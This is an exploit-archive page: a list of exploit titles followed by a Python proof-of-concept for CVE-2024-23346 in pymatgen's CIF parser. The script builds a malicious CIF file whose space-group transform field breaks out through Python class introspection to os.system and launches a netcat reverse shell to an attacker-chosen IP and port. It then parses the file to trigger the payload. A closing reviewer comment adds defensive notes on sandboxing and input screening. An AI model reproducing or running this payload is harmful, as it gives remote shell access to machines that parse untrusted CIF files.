
22 changes to exploits/shellcodes/ghdb Spring Boot common-user-management 0.1 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE) ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS ABB Cylon Aspect 3.08.03 - Hard-coded Secrets Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE) IBMi Navigator 7.5 - HTTP Security Token Bypass IBMi Navigator 7.5 - Server Side Request Forgery (SSRF) Plane 0.23.1 - Server side request forgery (SSRF) ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS) ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated) OpenCMS 17.0 - Stored Cross Site Scripting (XSS) Really Simple Security 9.1.1.1 - Authentication Bypass Pymatgen 2024.1 - Remote Code Execution (RCE)
53 lines
No EOL
1.8 KiB
Python
Executable file
# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
|
|
# Google Dork : (not applicable)
|
|
# Date : 2024-11-13
|
|
# Exploit Author : Mohammed Idrees Banyamer
|
|
# Vendor Homepage : https ://pymatgen.org
|
|
# Software Link : https ://pypi.org /project /pymatgen/
|
|
# Version : 2024.1
|
|
# Tested on : Kali Linux 2024.1
|
|
# CVE : CVE-2024-23346
|
|
|
|
|
|
import os
|
|
|
|
# Function to create the malicious CIF file
|
|
def create_malicious_cif(ip, port):
|
|
# Constructing the malicious CIF file with reverse shell payload
|
|
malicious_cif = f"""
|
|
data_5yOhtAoR
|
|
_audit_creation_date 2024-11-13
|
|
_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"
|
|
|
|
loop_
|
|
_parent_propagation_vector.id
|
|
_parent_propagation_vector.kxkykz
|
|
k1 [0 0 0]
|
|
|
|
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'
|
|
|
|
_space_group_magn.number_BNS 62.448
|
|
_space_group_magn.name_BNS "P n' m a' "
|
|
"""
|
|
|
|
# Save to a file
|
|
with open("vuln.cif", "w") as file:
|
|
file.write(malicious_cif)
|
|
print("[*] Malicious CIF file created: vuln.cif")
|
|
|
|
# Function to trigger the exploit by parsing the malicious CIF file
|
|
def exploit():
|
|
ip = input("Enter your IP address for the reverse shell: ")
|
|
port = input("Enter the port for the reverse shell to listen on: ")
|
|
|
|
# Create the malicious CIF file
|
|
create_malicious_cif(ip, port)
|
|
|
|
# Trigger the Pymatgen CIF parser to parse the malicious file
|
|
from pymatgen.io.cif import CifParser
|
|
parser = CifParser("vuln.cif")
|
|
structure = parser.parse_structures()
|
|
|
|
# Running the exploit
|
|
if __name__ == "__main__":
|
|
exploit() |
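Review bot: The header comments and `exploit()` never state that the script parses `vuln.cif` with the locally installed pymatgen, so the command embedded in `create_malicious_cif()` runs on the machine that executes this file. The header also gives only `# Version : 2024.1` and no affected or fixed release range. I would add above `def exploit():` a comment such as `# NOTE: parsing happens locally; run only in a disposable, isolated VM with a vulnerable pymatgen installed`, and a header line `# Fixed in : <FIXED_VERSION placeholder, take from the CVE-2024-23346 advisory>`. For readers on the defending side it is also worth one comment that the injected expression travels in the `_space_group_magn.transform_BNS_Pp_abc` value, which, as far as the public advisory describes, reaches an eval()-based transformation-string parser. A service that accepts CIF uploads can therefore screen that tag for `__` attribute access or call syntax before parsing, and should parse untrusted files in an unprivileged sandbox with no outbound network until pymatgen is upgraded.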